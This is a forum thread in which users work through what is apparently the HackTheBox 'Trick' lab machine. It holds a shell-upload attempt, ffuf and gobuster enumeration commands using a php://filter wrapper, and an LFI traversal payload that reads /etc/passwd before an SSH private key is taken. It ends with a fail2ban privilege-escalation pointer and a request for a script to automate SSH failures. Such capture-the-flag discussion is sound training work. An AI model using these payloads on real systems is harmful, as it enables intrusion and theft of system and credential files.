[quote="11231123" pid="101664" dateline="1655627121"]If it is save_settings, is there any way we can bypass this to upload a shell? (unable to directory traversal with the file name)[code]Warning: move_uploaded_file(assets/img/1655626740_shell.php): failed to open stream: Permission denied in /var/www/payroll/admin_class.php on line 108

Warning: move_uploaded_file(): Unable to move '/tmp/phpw5CW6H' to 'assets/img/1655626740_shell.php' in /var/www/payroll/admin_class.php on line 108
[/code][/quote]How did you upload a file ? you use burp ? postman ?

[quote="fironeDerbert" pid="101787" dateline="1655638810"][quote="11231123" pid="101664" dateline="1655627121"]If it is save_settings, is there any way we can bypass this to upload a shell? (unable to directory traversal with the file name)[code]Warning: move_uploaded_file(assets/img/1655626740_shell.php): failed to open stream: Permission denied in /var/www/payroll/admin_class.php on line 108

Warning: move_uploaded_file(): Unable to move '/tmp/phpw5CW6H' to 'assets/img/1655626740_shell.php' in /var/www/payroll/admin_class.php on line 108
[/code][/quote]How did you upload a file ? you use burp ? postman ?[/quote]I used curl with the "-F" flag.

There is a other subdomain, find folder

while read -r line; do echo $line ; done < /usr/share/wordlist/dirb/small.txt | ffuf -u 'http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=../FUZZ/index' -w  /dev/stdin -fs 9458

and guess the domain

(June 19, 2022, 12:10 PM)loge23 Wrote: There is a other subdomain, find folder

while read -r line; do echo $line ; done < /usr/share/wordlist/dirb/small.txt | ffuf -u 'http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=../FUZZ/index' -w  /dev/stdin -fs 9458

and guess the domain

market ?

(June 19, 2022, 12:23 PM)fironeDerbert Wrote:

(June 19, 2022, 12:10 PM)loge23 Wrote: There is a other subdomain, find folder

while read -r line; do echo $line ; done < /usr/share/wordlist/dirb/small.txt | ffuf -u 'http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=../FUZZ/index' -w  /dev/stdin -fs 9458

and guess the domain

market ?

Yes

while read -r line; do echo "preprod-$line" ; done < /usr/share/wordlist/dirb/small.txt | gobuster vhost -u http://trick.htb/ -w /dev/stdin

New subdomain: http://preprod-marketing.trick.htb
And LFI !
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd

Take the id_rsa and get the SSH :D

(June 19, 2022, 12:51 PM)fironeDerbert Wrote: New subdomain: http://preprod-marketing.trick.htb
And LFI !
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd

Take the id_rsa and get the SSH :D

You are wolcome

I think the priv esc is with fail2ban
We have 2 groups: michael and security
We can run this /etc/init.d/fail2ban restart as root
And this file: /etc/fail2ban/action.d is owned by root : security

Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7

Can someone send a script that automate the 10 ssh fails within 10 seconds...